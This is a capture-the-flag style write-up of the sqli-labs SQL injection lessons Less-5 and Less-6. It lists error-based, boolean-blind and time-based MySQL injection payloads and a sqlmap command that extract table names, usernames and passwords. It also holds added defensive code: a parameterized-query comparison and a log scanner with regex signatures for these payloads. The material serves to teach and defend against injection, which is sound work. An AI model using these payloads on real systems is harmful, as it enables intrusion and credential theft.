Less-5
id=1\
near ''1\' LIMIT 0,1' at line 1
Closes with a single quote: '
' --+ works, but the page keeps showing "You are in....."
Seeing this error message, the first thoughts are boolean-based blind injection, error-based injection and time-based blind injection.
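The two things the lab gets wrong, and that the whole writeup relies on, are visible in that first probe: the parameter is pasted into a quoted literal, and the database error is printed back to the user. The following added example (my code, not sqli-labs code) rebuilds the lab's `WHERE id='$id' LIMIT 0,1` lookup on SQLite so it runs offline, with the string-concatenated version next to a parameterized one. The `users` rows are constructed; SQLite's error wording differs from MySQL's, but the point carries over: a stray quote breaks the vulnerable query, `' --+` makes it succeed anyway, and the bound parameter treats both inputs as literal text.

```python
import sqlite3

# Added example (not sqli-labs code): the lab's query pattern rebuilt on SQLite.
# Table layout follows the lab's users table; the rows here are constructed.


def make_db():
    """Create an in-memory database with a small constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")],
    )
    return conn


def vulnerable_lookup(conn, user_id):
    """Builds the query by string concatenation and echoes the DB error text.

    Both defects are what the writeup exploits: the quote in user_id breaks out
    of the literal, and the verbose error message carries data back to the user.
    """
    sql = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("error", str(exc))  # the lab prints this verbatim
    return ("row", row[0]) if row else ("empty", None)


def safe_lookup(conn, user_id):
    """Bound parameter plus a generic error: the same inputs stay inert."""
    try:
        row = conn.execute(
            "SELECT username FROM users WHERE id=? LIMIT 0,1", (user_id,)
        ).fetchone()
    except sqlite3.Error:
        return ("error", "internal error")  # never leak the driver's message
    return ("row", row[0]) if row else ("empty", None)


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1' --+"):
        print(repr(probe), "vulnerable:", vulnerable_lookup(db, probe),
              "safe:", safe_lookup(db, probe))
```

With the bound parameter, `1'` and `1' --+` simply match no row; there is no syntax error to read and no way for the comment sequence to truncate the statement, so none of the three methods below have anything to work with. Hiding the driver's error text is the second half: even a parameterized application that prints raw database errors hands an attacker useful debugging output.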
Method 1: error-based injection
(1) Use the error-reporting functions extractvalue / updatexml
id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) --+
(2) Use the concat aggregate trick (succeeds randomly)
Simply put, when an aggregate function is used in a double query, part of the query result is shown inside the error message.
For example, if count() is followed by a GROUP BY clause, part of the query result is displayed as an error.
Test querying the database version in phpMyAdmin:
select count(*), concat(0x7e,(select version()),0x3a, floor(rand()*2))a from information_schema.tables group by a;
Shows: #1062 - Duplicate entry '~5.5.53:0' for key 'group_key'
Dump the database name
id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
// or
id=-1'union select count(*),count(*), concat('~',(select database()),'~',floor(rand()*2))a from information_schema.tables group by a--+
// or
id=-1'union select count(*),1, concat('~',(select database()),'~',floor(rand()*2))a from information_schema.tables group by a--+
Duplicate entry '::security::0' for key 'group_key'
Dump table names
id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
// or
id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
Duplicate entry '::emails::1' for key 'group_key'
Dump column names
id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
// or
id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
Change limit x,1 to iterate over the column names:
Duplicate entry '~referers~1' for key 'group_key'
Dump the fields
Username
id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
Password
id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
// or
id=-1' union select count(*),1, concat('~',(select concat_ws(':',username,password) from users limit 0,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
Change limit x,1 to show the x-th user's username and password.
SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1; returns:
+----------+
| con_ws |
+----------+
| 1_BioCyc |
+----------+
Duplicate entry '::Dumb::1' for key 'group_key'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Method 2: boolean-based manual injection
A simplified form of the time-based injection: left( , )=' '. Note that the x in left(,x) can be larger than the actual length and the comparison still holds, as in statements 2 and 3 under "dump column names".
In boolean-based injection a true condition echoes the normal page and a false one does not; this is the basis for brute-forcing character by character. Note that id=1 is used.
If true, the page shows You are in...........
During manual injection, a comparison such as left((select database()),1)<'h' allows a binary-search style brute force that is much faster.
Determine the database name length, then the database name
Determine the number of tables, their lengths, then the table names
Determine the number of columns, their lengths, then the column names
Determine the number of fields, their lengths, then the values
Dump the database
id=1' and left((select database()),1)='s' --+
id=1' and left((select database()),2)='se' --+
Dump tables
id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' --+
id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),6)='emails' --+
id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+
Adjust limit x,1 and the length argument to left(): the first table found is emails, and the user table, named users, is finally found at limit 3,1.
Dump column names
id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id' --+
id=1' and left((select column_name from information_schema.columns where table_name='users' limit 2,1),8)='password' --+
id=1' and left((select column_name from information_schema.columns where table_name='users' limit 2,1),9)='password' --+
Dump the fields
Username
id=1' and left((select username from users order by id limit 0,1),1)='d' --+
Password
id=1' and left((select password from users order by id limit 0,1),1)='d' --+
Note that MySQL is not case-sensitive here.
===============================================================================================
Method 3: time-based manual injection: if(left( , )=' ',sleep(5),1)
IF(expr1,expr2,expr3)
If expr1 is TRUE (expr1 <> 0 and expr1 <> NULL), IF() returns expr2; otherwise it returns expr3.
id=1' and sleep(10) --+
Dump the database name length
id=1' and if(length(database())=8,sleep(5),1)--+
Dump the database name
id=1' and if(left(database(),1)='s',sleep(5),1)--+
id=1' and if(left(database(),2)='se',sleep(5),1)--+
Dump table names
id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e' ,sleep(5),1)--+
id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),2)='em' ,sleep(5),1)--+
Dump column names
id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),8)='id' ,sleep(5),1)--+
Dump values
id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
================================================================================================
Method 4: sqlmap
sqlmap -u "http://192.168.26.148/sql/Less-5/?id=1" --current-db --batch
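All four methods above leave very recognisable traces in the web server's access log: the error-based payloads name `extractvalue`/`updatexml` or the `floor(rand()*2) ... group by` trick, the boolean probes compare `left(...)` against a literal, the time-based ones call `sleep()`, and sqlmap announces itself in its default User-Agent unless told otherwise. The following added example (my code, not from the writeup or from sqlmap) classifies requests in Apache combined-format log lines by those signatures. The log lines, IP addresses and the sqlmap version string are constructed for this example; the query strings mirror the payloads shown above. Matching is done on the URL-decoded, lower-cased query string, so the double-quote variant used in Less-6 is caught by the same rules.

```python
import re
from urllib.parse import unquote_plus

# Added example (not part of the writeup): flag the payload families the
# writeup uses, plus sqlmap's default User-Agent, in combined-format access
# logs. The lines below are constructed; the paths mirror the writeup's payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sql/Less-5/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sql/Less-5/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20database())))%20--+ HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sql/Less-5/?id=1%27%20and%20left((select%20database()),1)=%27s%27%20--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /sql/Less-5/?id=1%27%20and%20if(length(database())=8,sleep(5),1)--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /sql/Less-5/?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:11 +0000] "GET /sql/Less-5/?id=-1%27%20union%20select%20count(*),1,concat(%27~%27,(select%20database()),%27~%27,floor(rand()*2))a%20from%20information_schema.tables%20group%20by%20a--+ HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures run against the URL-decoded, lower-cased query string, so the
# single-quote (Less-5) and double-quote (Less-6) variants look identical.
SIGNATURES = [
    ("error_based", re.compile(r"\b(extractvalue|updatexml)\s*\(")),
    ("error_based", re.compile(r"floor\s*\(\s*rand\s*\(\s*\)\s*\*\s*2\s*\).*\bgroup\s+by\b")),
    ("time_based", re.compile(r"\bsleep\s*\(\s*\d+")),
    ("boolean_blind", re.compile(r"\b(and|or)\b.*\bleft\s*\(.*\)\s*[=<>]")),
    ("schema_enumeration", re.compile(r"\binformation_schema\.")),
]


def classify_request(path, user_agent):
    """Return the sorted list of tags that apply to one request."""
    query = path.split("?", 1)[1] if "?" in path else ""
    decoded = unquote_plus(query).lower()  # %27 -> ', --+ -> "-- "
    tags = {tag for tag, rx in SIGNATURES if rx.search(decoded)}
    if "sqlmap" in user_agent.lower():
        tags.add("scanner_ua")
    return sorted(tags)


def scan_log(text):
    """Parse each line and keep only those that carry at least one tag."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        tags = classify_request(m["path"], m["ua"])
        if tags:
            hits.append((m["ip"], tags))
    return hits


if __name__ == "__main__":
    for ip, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags))
```

Signature matching is a first filter, not a verdict: a single `time_based` hit from one address is noise, while a run of `boolean_blind` requests from the same address whose query strings differ only in the `left(...)` length and compared literal is the character-by-character enumeration described in Method 2, and a burst of `error_based` hits followed by clean requests is the shape of Method 1 once the data has been read out of the error page. For Method 3 the log alone is blind; pair it with response-time data, since the whole technique is a 5-second delay on a true condition.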
Less-6 is the same as Less-5
Less-6
id=2\
near '"1\" LIMIT 0,1' at line 1
Closes with a double quote: "
Just replace the single quote from Less-5 with a double quote.
Error-based injection
Time-based blind injection
Boolean-based blind injection
sqlmap